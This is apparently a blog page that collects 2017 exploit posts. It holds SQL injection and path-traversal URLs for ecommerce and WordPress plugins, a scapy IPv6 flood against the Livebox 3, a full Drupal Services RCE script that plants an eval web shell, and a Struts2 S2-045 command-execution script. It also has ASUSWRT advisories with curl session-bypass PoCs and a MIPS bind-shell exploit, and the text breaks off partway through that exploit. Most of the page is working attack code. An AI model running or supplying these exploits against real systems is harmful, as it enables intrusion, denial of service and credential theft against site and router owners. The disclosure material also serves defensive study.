# # # # #
# Exploit Title: Fashmark - eCommerce Script v1.2 - SQL Injection
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.ncrypted.net/
# Software: https://www.ncrypted.net/fashmark
# Demo: http://demo.ncryptedprojects.com/fashmark-ent/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search/?searchChar=Ihsan_Sencan&category=[SQL]
# Etc..
# # # # #
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863178416
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# # # # #
# Exploit Title: TradeMart - B2B Trading Software v1.1 - SQL Injection
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.ncrypted.net/
# Software: https://www.ncrypted.net/trademart
# Demo: http://demo.ncryptedprojects.com/trademart/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/Search?by=p&q=&user=[SQL]
# Etc..
# # # # #
#!/usr/bin/python
# Exploit Title: CVE-2017-6552 - Local DoS Buffer Overflow Livebox 3
# Date: 09/03/2017
# Exploit Author: Quentin Olagne
# Vendor Homepage: http://www.orange.fr/
# Version: SG30_sip-fr-5.15.8.1
# Tested on: Livebox 3 - Sagemcom
# CVE : CVE-2017-6552
'''
Livebox router has its default IPv6 routing table max. size too
small and therefore can be filled within minutes.
An attacker can exploit this issue to render the affected system
unresponsive, resulting in a denial-of-service condition for Phone,
Internet and TV services.
Vulenrability has been discovered in April '16 and has been patched some time ago with the newest firmware.
I have submitted the idea to have a button to enable/disable IPv6 stack on the local interface from the admin
livebox web UI, don't know if it's been implemented.
'''
from scapy.all import *
import time
import threading
start_time = time.time()
def printit():
threading.Timer(5.0, printit).start()
interval = time.time() - start_time
print 'Total time in seconds:', interval, '\n'
printit()
packet = Ether() \
/IPv6() \
/ICMPv6ND_RA() \
/ICMPv6NDOptPrefixInfo(prefix=RandIP6(),prefixlen=64) \
/ICMPv6NDOptSrcLLAddr(lladdr=RandMAC("00:01:42"))
try:
sendp(packet,loop=1)
except KeyboardInterrupt:
stored_exception=sys.exc_info()
except:
pass
print "Goodbye"
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
<?php
# Drupal Services Module Remote Code Execution Exploit
# https://www.ambionics.io/blog/drupal-services-module-rce
# cf
#
# Three stages:
# 1. Use the SQL Injection to get the contents of the cache for current endpoint
# along with admin credentials and hash
# 2. Alter the cache to allow us to write a file and do so
# 3. Restore the cache
#
# Initialization
error_reporting(E_ALL);
define('QID', 'anything');
define('TYPE_PHP', 'application/vnd.php.serialized');
define('TYPE_JSON', 'application/json');
define('CONTROLLER', 'user');
define('ACTION', 'login');
$url = 'http://vmweb.lan/drupal-7.54';
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';
$file = [
'filename' => 'dixuSOspsOUU.php',
'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
];
$browser = new Browser($url . $endpoint_path);
# Stage 1: SQL Injection
class DatabaseCondition
{
protected $conditions = [
"#conjunction" => "AND"
];
protected $arguments = [];
protected $changed = false;
protected $queryPlaceholderIdentifier = null;
public $stringVersion = null;
public function __construct($stringVersion=null)
{
$this->stringVersion = $stringVersion;
if(!isset($stringVersion))
{
$this->changed = true;
$this->stringVersion = null;
}
}
}
class SelectQueryExtender {
# Contains a DatabaseCondition object instead of a SelectQueryInterface
# so that $query->compile() exists and (string) $query is controlled by us.
protected $query = null;
protected $uniqueIdentifier = QID;
protected $connection;
protected $placeholder = 0;
public function __construct($sql)
{
$this->query = new DatabaseCondition($sql);
}
}
$cache_id = "services:$endpoint:resources";
$sql_cache = "SELECT data FROM {cache} WHERE cid='$cache_id'";
$password_hash = '$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd';
# Take first user but with a custom password
# Store the original password hash in signature_format, and endpoint cache
# in signature
$query =
"0x3a) UNION SELECT ux.uid AS uid, " .
"ux.name AS name, '$password_hash' AS pass, " .
"ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, " .
"ux.pass AS signature_format, ux.created AS created, " .
"ux.access AS access, ux.login AS login, ux.status AS status, " .
"ux.timezone AS timezone, ux.language AS language, ux.picture " .
"AS picture, ux.init AS init, ux.data AS data FROM {users} ux " .
"WHERE ux.uid<>(0"
;
$query = new SelectQueryExtender($query);
$data = ['username' => $query, 'password' => 'ouvreboite'];
$data = serialize($data);
$json = $browser->post(TYPE_PHP, $data);
# If this worked, the rest will as well
if(!isset($json->user))
{
print_r($json);
e("Failed to login with fake password");
}
# Store session and user data
$session = [
'session_name' => $json->session_name,
'session_id' => $json->sessid,
'token' => $json->token
];
store('session', $session);
$user = $json->user;
# Unserialize the cached value
# Note: Drupal websites admins, this is your opportunity to fight back :)
$cache = unserialize($user->signature);
# Reassign fields
$user->pass = $user->signature_format;
unset($user->signature);
unset($user->signature_format);
store('user', $user);
if($cache === false)
{
e("Unable to obtains endpoint's cache value");
}
x("Cache contains " . sizeof($cache) . " entries");
# Stage 2: Change endpoint's behaviour to write a shell
class DrupalCacheArray
{
# Cache ID
protected $cid = "services:endpoint_name:resources";
# Name of the table to fetch data from.
# Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()
protected $bin = 'cache';
protected $keysToPersist = [];
protected $storage = [];
function __construct($storage, $endpoint, $controller, $action) {
$settings = [
'services' => ['resource_api_version' => '1.0']
];
$this->cid = "services:$endpoint:resources";
# If no endpoint is given, just reset the original values
if(isset($controller))
{
$storage[$controller]['actions'][$action] = [
'help' => 'Writes data to a file',
# Callback function
'callback' => 'file_put_contents',
# This one does not accept "true" as Drupal does,
# so we just go for a tautology
'access callback' => 'is_string',
'access arguments' => ['a string'],
# Arguments given through POST
'args' => [
0 => [
'name' => 'filename',
'type' => 'string',
'description' => 'Path to the file',
'source' => ['data' => 'filename'],
'optional' => false,
],
1 => [
'name' => 'data',
'type' => 'string',
'description' => 'The data to write',
'source' => ['data' => 'data'],
'optional' => false,
],
],
'file' => [
'type' => 'inc',
'module' => 'services',
'name' => 'resources/user_resource',
],
'endpoint' => $settings
];
$storage[$controller]['endpoint']['actions'] += [
$action => [
'enabled' => 1,
'settings' => $settings
]
];
}
$this->storage = $storage;
$this->keysToPersist = array_fill_keys(array_keys($storage), true);
}
}
class ThemeRegistry Extends DrupalCacheArray {
protected $persistable;
protected $completeRegistry;
}
cache_poison($endpoint, $cache);
# Write the file
$json = (array) $browser->post(TYPE_JSON, json_encode($file));
# Stage 3: Restore endpoint's behaviour
cache_reset($endpoint, $cache);
if(!(isset($json[0]) && $json[0] === strlen($file['data'])))
{
e("Failed to write file.");
}
$file_url = $url . '/' . $file['filename'];
x("File written: $file_url");
# HTTP Browser
class Browser
{
private $url;
private $controller = CONTROLLER;
private $action = ACTION;
function __construct($url)
{
$this->url = $url;
}
function post($type, $data)
{
$headers = [
"Accept: " . TYPE_JSON,
"Content-Type: $type",
"Content-Length: " . strlen($data)
];
$url = $this->url . '/' . $this->controller . '/' . $this->action;
$s = curl_init();
curl_setopt($s, CURLOPT_URL, $url);
curl_setopt($s, CURLOPT_HTTPHEADER, $headers);
curl_setopt($s, CURLOPT_POST, 1);
curl_setopt($s, CURLOPT_POSTFIELDS, $data);
curl_setopt($s, CURLOPT_RETURNTRANSFER, true);
curl_setopt($s, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($s, CURLOPT_SSL_VERIFYPEER, 0);
$output = curl_exec($s);
$error = curl_error($s);
curl_close($s);
if($error)
{
e("cURL: $error");
}
return json_decode($output);
}
}
# Cache
function cache_poison($endpoint, $cache)
{
$tr = new ThemeRegistry($cache, $endpoint, CONTROLLER, ACTION);
cache_edit($tr);
}
function cache_reset($endpoint, $cache)
{
$tr = new ThemeRegistry($cache, $endpoint, null, null);
cache_edit($tr);
}
function cache_edit($tr)
{
global $browser;
$data = serialize([$tr]);
$json = $browser->post(TYPE_PHP, $data);
}
# Utils
function x($message)
{
print("$message\n");
}
function e($message)
{
x($message);
exit(1);
}
function store($name, $data)
{
$filename = "$name.json";
file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT));
x("Stored $name information in $filename");
}
# # # # #
# Exploit Title: WordPress Plugin Mac Photo Gallery v3.0 - Arbitrary File Download
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.apptha.com/
# Software: https://www.apptha.com/category/extension/Wordpress/Mac-Photo-Gallery
# Demo: http://www.apptha.com/demo/mac-photo-gallery
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# Exploit :
# http://localhost/[PLUGIN_PATH]/macdownload.php?albid=../../../wp-load.php
# Etc..
# # # # #
# # # # #
# Exploit Title: WordPress Plugin Apptha Slider Gallery v1.0 - SQL Injection
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.apptha.com/
# Software: https://www.apptha.com/category/extension/Wordpress/apptha-slider-gallery
# Demo: http://www.apptha.com/demo/apptha-slider-gallery
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?albid=[SQL]
# For example;
# -3+/*!50000union*/+select+1,2,3,4,5,0x496873616e2053656e63616e20207777772e696873616e2e6e6574,concat(user_login,0x3a,user_pass),8,9,10,11,12,13,14+from+pleasant_users--+-&pid=6
# admin:$P$BKL0XND.tfopqZH6S.QU.vhgjuVchx1
# Etc..
# # # # #
# # # # #
# Exploit Title: WordPress Plugin Apptha Slider Gallery v1.0 - Arbitrary File Download
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.apptha.com/
# Software: https://www.apptha.com/category/extension/Wordpress/apptha-slider-gallery
# Demo: http://www.apptha.com/demo/apptha-slider-gallery
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PLUGIN_PATH]/asgallDownload.php?imgname=../../../wp-load.php
# Etc..
# # # # #
# # # # #
# Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.apptha.com/
# Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery
# Demo: http://www.apptha.com/demo/pica-photo-gallery
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?aid=[SQL]
# For example;
# -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+-
# wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users
# Etc..
# # # # #
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib
def exploit(url, cmd):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % cmd
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
try:
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
request = urllib2.Request(url, headers=headers)
page = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
page = e.partial
print(page)
return page
if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print("[*] struts2_S2-045.py <url> <cmd>")
else:
print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
url = sys.argv[1]
cmd = sys.argv[2]
print("[*] cmd: %s\n" % cmd)
exploit(url, cmd)
Cross-Site Scripting (XSS)
Component: httpd
CVE: CVE-2017-6547
Vulnerability:
httpd checks in the function handle_request if the requested file name is longer than 50 chars. It then responds with a redirection which allows an attacker to inject arbitrary JavaScript code into the router’s web interface context.
...
if(strlen(file) > 50 &&!(strstr(file, "findasus")) && !(strstr(file, "acme-challenge")))
{
char inviteCode[256];
snprintf(inviteCode, sizeof(inviteCode), "<script>location.href='/cloud_sync.asp?flag=%s';</script>", file);
send_page( 200, "OK", (char*) 0, inviteCode, 0);
...
PoC:
http://192.168.1.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';alert('XSS');'A
Session Stealing
Component: httpd
CVE: CVE-2017-6549
Vulnerability:
httpd uses the function search_token_in_list to validate if a user is logged into the admin interface by checking his asus_token value. There seems to be a branch which could be a failed attempt to build in a logout functionality.
asus_token_t* search_token_in_list(char* token, asus_token_t **prev)
{
asus_token_t *ptr = head;
asus_token_t *tmp = NULL;
int found = 0;
char *cp = NULL;
while(ptr != NULL)
{
if(!strncmp(token, ptr->token, 32)) {
found = 1;
break;
}
else if(strncmp(token, "cgi_logout", 10) == 0) {
cp = strtok(ptr->useragent, "-");
if(strcmp(cp, "asusrouter") != 0) {
found = 1;
break;
}
}
else {
tmp = ptr;
ptr = ptr->next;
}
}
if(found == 1) {
if(prev)
*prev = tmp;
return ptr;
}
else {
return NULL;
}
}
If an attacker sets his cookie value to cgi_logout and puts asusrouter-Windows-IFTTT-1.0 into his User-Agent header he will be treated as signed-in if any other administrator session is active.
PoC:
# read syslog
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/syslog.txt
#reboot router
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/apply.cgi1 -d 'action_mode=reboot&action_script=&action_wait=70'
It’s possible to execute arbitrary commands on the router if any admin session is currently active.
Remote Code Execution
Component: networkmap
CVE: CVE-2017-6548
networkmap is responsible for generating a map of computers connected to the router. It continuously monitors the LAN to detect ARP requests submitted by unknown computers. When a new MAC address appears it will probe the related IP address for running services like printer sharing, http server and also iTunes servers.
This is implemented by sending out multicast SSP discoveries:
M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
ST:upnp:rootdevice
MAN:"ssdp:discover"
MX:3
A device can then respond with messages which indicate the location of the iTunes service.
HTTP/1.1 200 OK
Location:HTTP://host:port/path
Vulnerability:
The function process_device_repsonse is responsible for parsing the SSDP answer:
/************************************************************************************************/
// process the device response "HTTP/1.1 200 OK"
int process_device_response(char *msg)
{
char *line, *body, *p; // temporary variables
char *location = NULL; // the LOCATION: header
char host[16], port[6]; // the ip and port of the device
ushort destport; // the integer type of device port
char *data = NULL; // the data in packet
int http_fd; // the http socket fd
int nbytes; // recv number
int i;
char *descri = NULL;
int len;
struct timeval timeout={10, 0};
//search "\r\n\r\n" or "\r\n" first appear place and judge whether msg have blank.
if( (body = strstr(msg, "\r\n\r\n")) != NULL)
body +=4;
else if ( (body = strstr(msg, "\r\n")) != NULL)
body +=2;
else
return 0;
p = msg;
// find the LOCATION information.
while( p!= NULL && p < body)
{
line = strsep(&p, "\r\n"); //divide up string
if((strncmp(line, "LOCATION:", 9) == 0) || (strncmp(line, "Location:", 9) == 0))
{
location = strip_chars(&line[9], "\t");
location = strip_chars(&line[9], " ");
break;
}
}
NMP_DEBUG_F("UPnP location=%s\n", location);
//fprintf(fp_upnp, "UPnP location=%s\n", location);//Yau
// get the destination ip
location += 7;
i = 0;
while( (*location != ':') && (*location != '/')) {
host[i] = *location++;
i++;
}
host[i] = '\0';
//get the destination port
if(*location == ':') {
for(location++, i =0; *location != '/'; i++)
port[i] = *location++;
port[i] = '\0';
destport = (ushort)atoi(port);
}
else
destport = 80;
It contains multiple buffer overflows in the parsing code for host and port. This stack-based overflow can be used to gain control over networkmap’s control flow by overwriting the saved $pc stored on the stack.
Parsing this message:
HTTP/1.1 200 OK
Location:HTTP://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
will overflow host[16] and lead to $pc being set to 0x41414141 which is a starting point for further exploitation.
Exploitation:
In order to develop a working exploit we gather further information of the system.
General Information:
ASUSWRT is based on Linux which is running on a little endian MIPS CPU. The vulnerable program networkmap gets automatically started when the device boots and additionally gets restarted by the watchdog process if it crashes.
# cat /proc/cpuinfo
system type : MT7620
processor : 0
cpu model : MIPS 24Kc V5.0
BogoMIPS : 386.04
wait instruction : yes
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : yes
hardware watchpoint : yes, count: 4, address/irw mask: [0x0000, 0x0ff8, 0x0ff8, 0x0ff8]
ASEs implemented : mips16 dsp
shadow register sets : 1
core : 0
VCED exceptions : not available
VCEI exceptions : not available
# ps
PID USER VSZ STAT COMMAND
1 admin 3940 S /sbin/init
2 admin 0 SW [kthreadd]
3 admin 0 SW [ksoftirqd/0]
4 admin 0 SW [kworker/0:0]
5 admin 0 SW [kworker/u:0]
6 admin 0 SW< [khelper]
7 admin 0 SW [sync_supers]
8 admin 0 SW [bdi-default]
9 admin 0 SW< [kintegrityd]
10 admin 0 SW< [kblockd]
11 admin 0 SW [kswapd0]
12 admin 0 SW [fsnotify_mark]
13 admin 0 SW< [crypto]
17 admin 0 SW [mtdblock0]
18 admin 0 SW [mtdblock1]
19 admin 0 SW [mtdblock2]
20 admin 0 SW [mtdblock3]
21 admin 0 SW [mtdblock4]
22 admin 0 SW [mtdblock5]
23 admin 0 SW [kworker/u:1]
30 admin 0 SW [kworker/0:1]
41 admin 660 S hotplug2 --persistent --no-coldplug
76 admin 3924 S console
78 admin 1276 S /sbin/syslogd -m 0 -S -O /tmp/syslog.log -s 256 -l 6
80 admin 1276 S /sbin/klogd -c 5
82 admin 1292 S /bin/sh
115 admin 0 SW [RtmpCmdQTask]
116 admin 0 SW [RtmpWscTask]
135 admin 0 SW [RtmpCmdQTask]
136 admin 0 SW [RtmpWscTask]
164 admin 3932 S /sbin/wanduck
168 admin 1128 S dropbear -p 192.168.1.1:22 -a
175 admin 3932 S wpsaide
189 nobody 1056 S dnsmasq --log-async
194 admin 2588 S avahi-daemon: running [RT-AC53-B8F4.local]
196 admin 4112 S httpd -i br0
197 admin 1068 S /usr/sbin/infosvr br0
199 admin 3932 S watchdog
201 admin 2180 S rstats
210 admin 1160 S lld2d br0
211 admin 3932 S ots
224 admin 800 S miniupnpd -f /etc/upnp/config
229 admin 1284 S /sbin/udhcpc -i vlan2 -p /var/run/udhcpc0.pid -s /tmp/udhcpc -O33 -O249
302 admin 1152 S dropbear -p 192.168.1.1:22 -a
303 admin 1300 S -sh
344 admin 1128 S networkmap
359 admin 1280 R ps
# uname -a
Linux (none) 2.6.36 #1 Fri Sep 23 12:05:55 CST 2016 mips GNU/Linux
Memory Map:
networkmap’s memory map is analyzed to continue exploiting the device.
# cat /proc/$(pidof networkmap)/maps
00400000-0040b000 r-xp 00000000 1f:04 270 /usr/sbin/networkmap
0041a000-0041b000 rw-p 0000a000 1f:04 270 /usr/sbin/networkmap
0041b000-0041f000 rwxp 00000000 00:00 0 [heap]
2b893000-2b894000 rw-p 00000000 00:00 0
2b894000-2b89a000 r-xp 00000000 1f:04 828 /lib/ld-uClibc.so.0
2b89a000-2b8a0000 rw-s 00000000 00:04 0 /SYSV000003e9 (deleted)
2b8a0000-2b8a4000 rw-s 00000000 00:04 32769 /SYSV000003ea (deleted)
2b8a9000-2b8aa000 r--p 00005000 1f:04 828 /lib/ld-uClibc.so.0
2b8aa000-2b8ab000 rw-p 00006000 1f:04 828 /lib/ld-uClibc.so.0
2b8ab000-2b8d9000 r-xp 00000000 1f:04 258 /usr/lib/libshared.so
2b8d9000-2b8e8000 ---p 00000000 00:00 0
2b8e8000-2b8eb000 rw-p 0002d000 1f:04 258 /usr/lib/libshared.so
2b8eb000-2b8ed000 rw-p 00000000 00:00 0
2b8ed000-2b8ef000 r-xp 00000000 1f:04 235 /usr/lib/libnvram.so
2b8ef000-2b8ff000 ---p 00000000 00:00 0
2b8ff000-2b900000 rw-p 00002000 1f:04 235 /usr/lib/libnvram.so
2b900000-2b90e000 r-xp 00000000 1f:04 760 /lib/libgcc_s.so.1
2b90e000-2b91e000 ---p 00000000 00:00 0
2b91e000-2b91f000 rw-p 0000e000 1f:04 760 /lib/libgcc_s.so.1
2b91f000-2b95a000 r-xp 00000000 1f:04 827 /lib/libc.so.0
2b95a000-2b96a000 ---p 00000000 00:00 0
2b96a000-2b96b000 rw-p 0003b000 1f:04 827 /lib/libc.so.0
2b96b000-2b96f000 rw-p 00000000 00:00 0
2b970000-2b97f000 r--s 03eb0000 00:0c 78 /dev/nvram
7f8a7000-7f8c8000 rwxp 00000000 00:00 0 [stack]
7fff7000-7fff8000 r-xp 00000000 00:00 0 [vdso]
Observations:
Partial ASLR is activated:
Stack address is randomized
Library addresses are randomized
Program address is not randomized
Heap address is not randomized
There is no Stack-Protector
Both heap and stack are mapped executable
The binary contains almost no gadgets suitable for building a ROP chain
Exploit:
The final exploit consists of the following steps:
Starting a webserver serving shellcode
Listening for multicast UDP messages send by the router
Database clearing / crashing: to make the heap layout predictable
Randomizing MAC address
Send message: jump to gadget that deletes networkmap’s database and crashes
networkmap will be restarted
Spraying heap 1, 2:
Randomizing MAC address
Send message: containing the webserver’s IP+port
networkmap will receive shellcode and store it on the heap
Starting payload
Randomize MAC address
Send message: jump to heap address containing the shellcode
Connect to opened shell
For further details check out the full exploit: networkmap-pwn.py (https://bierbaumer.net/networkmap-pwn.py)
Example:
# ./networkmap-pwn.py
[-] starting webserver
[-] received SSP discovery
[-] clearing database and crashing
[-] received SSP discovery
[-] spraying heap 1/2
[-] got shellcode request
[-] sending shellcode
[-] received SSP discovery
[-] spraying heap 2/2
[-] received SSP discovery
[-] starting payload
[-] try to connect to shell
[-] try to connect to shell
[+] connected
Linux (none) 2.6.36 #1 Fri Sep 23 12:05:55 CST 2016 mips GNU/Linux
[+] pwned
---networkmap-pwn.py---
#!/usr/bin/env python3
# ASUSWRT networkmap Remote Code Execution
# Author: Bruno Bierbaumer
# Date: 24/02/2017
# Tested version:
# RT-AC53 (3.0.0.4.380.6038)
# CVE: TODO
# Description:
# networkmap contains a stack-based buffer overflow which can be exploited to run arbitrary code.
ROUTER_IP = '192.168.1.1'
IP = '192.168.1.2'
INTERACE = 'enp0s31f6'
"""
Shellcode adjusted from https://www.exploit-db.com/exploits/13298/
"""
sc = b"\x41\x41\x04\x28" *1400 # nops
#alarm handling
sc += b"\xff\xff\x04\x28" # a0 <- 0 */
sc += b"\xbb\x0f\x02\x24" # li v0,4027 ( __alarm ) */
sc += b"\x0c\x01\x01\x01" # syscall
sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
#/alarm
sc += b"\xe0\xff\xbd\x27" # addiu sp,sp,-32 */
sc += b"\xfd\xff\x0e\x24" # li t6,-3 */
sc += b"\x27\x20\xc0\x01" # nor a0,t6,zero */
sc += b"\x27\x28\xc0\x01" # nor a1,t6,zero */
sc += b"\xff\xff\x06\x28" # slti a2,zero,-1 */
sc += b"\x57\x10\x02\x24" # li v0,4183 ( __NR_socket ) */
sc += b"\x0c\x01\x01\x01" # syscall */
sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
sc += b"\xff\xff\x50\x30" # andi s0,v0,0xffff */
sc += b"\xef\xff\x0e\x24" # li t6,-17 */
sc += b"\x27\x70\xc0\x01" # nor t6,t6,zero */
sc += b"\x13\x37\x0d\x24" # li t5,0x3713 (port 0x1337) */
sc += b"\x04\x68\xcd\x01" # sllv t5,t5,t6 */
sc += b"\xff\xfd\x0e\x24" # li t6,-513 */
sc += b"\x27\x70\xc0\x01" # nor t6,t6,zero */
sc += b"\x25\x68\xae\x01" # or t5,t5,t6 */
sc += b"\xe0\xff\xad\xaf" # sw t5,-32(sp) */
sc += b"\xe4\xff\xa0\xaf" # sw zero,-28(sp) */
sc += b"\xe8\xff\xa0\xaf" # sw zero,-24(sp) */
sc += b"\xec\xff\xa0\xaf" # sw zero,-20(sp) */
sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
sc += b"\xef\xff\x0e\x24" # li t6,-17 */
sc += b"\x27\x30\xc0\x01" # nor a2,t6,zero */
sc += b"\xe0\xff\xa5\x23" # addi a1,sp,-32 */
sc += b"\x49\x10\x02\x24" # li v0,4169 ( __NR_bind ) */
sc += b"\x0c\x01\x01\x01" # syscall */
sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
sc += b"\x01\x01\x05\x24" # li a1,257 */
sc += b"\x4e\x10\x02\x24" # li v0,4174 ( __NR_listen ) */
sc += b"\x0c\x01\x01\x01" # syscall */
sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
sc += b"\xff\xff\x05\x28" # slti a1,zero,-1 */
sc += b"\xff\xff\x06\x28" # slti a2,zero,-1 */
sc += b"\x48\x10\x02\x24" # li v0,4168 ( __NR_accept ) */
sc += b"\x0c\x01\x01\x01" # syscall */
sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
sc += b"\xff\xff\x50\x30" # andi s0,v0,0xffff */
sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
sc += b"\xfd\xff\x0f\x24" # li t7,-3 */
sc += b"\x27\x28\xe0\x01" # nor a1,t7,zero */
sc += b"\xdf\x0f\x02\x24" # li v0,4063 ( __NR_dup2 ) */
sc += b"\x0c\x01\x01\x01" # syscall */
sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
sc += b"\x01\x01\x05\x28" # slti a1,zero,0x0101 */
sc += b"\xdf\x0f\x02\x24" # li v0,4063 ( __NR_dup2 ) */
sc += b"\x0c\x01\x01\x01" # syscall */
sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
sc += b"\xff\xff\x05\x28" # slti a1,zero,-1 */
sc += b"\xdf\x0f\x02\x24" # li v0,4063 ( __NR_dup2 ) */
sc += b"\x0c\x01\x01\x01" # syscall */
sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
sc += b"\x50\x73\x06\x24" # li a2,0x7350 */
sc += b"\xff\xff\xd0\x04" # LB: bltzal a2,LB */
sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
sc += b"\xff\xff\x06\x28" # slti a2,zero,-1 */
sc += b"\xdb\xff\x0f\x24" # li t7,-37 */
sc += b"\x27\x78\xe0\x01" # nor t7,t7,zero */
sc += b"\x21\x20\xef\x03" # addu a0,ra,t7 */
sc += b"\xf0\xff\xa4\xaf" # sw a0,-16(sp) */
sc += b"\xf4\xff\xa0\xaf" # sw zero,-12(sp) */
sc += b"\xf0\xff\xa5\x23" # addi a1,sp,-16 */
sc += b"\xab\x0f\x02\x24" # li v0,4011 ( __NR_execve ) */
sc += b"\x0c\x01\x01\x01" # syscall */
sc += b"/bin/sh";
import time
import struct
import socket
import sys
import os
import threading
import socketserver
import telnetlib
# randomize mac address
def mac():
os.system('macchanger -A {} > /dev/null'.format(INTERACE))
# setup interface
os.system('ifconfig {} down; ifconfig {} {} up; route add default gw {}'.format(INTERACE, INTERACE, IP, ROUTER_IP))
# setup minimal webserver for delivering the shellcode
class ThreadedHTTPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
print('[-] got shellcode request')
self.request.recv(1024)
print("[-] sending shellcode")
self.request.send(sc)
class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
print('[-] starting webserver')
socketserver.TCPServer.allow_reuse_address = True
server = ThreadedHTTPServer(('0.0.0.0', 1337), ThreadedHTTPRequestHandler)
t = threading.Thread(target=server.serve_forever)
t.start()
# start multicast receiver
addrinfo = socket.getaddrinfo('239.255.255.250', None)[0]
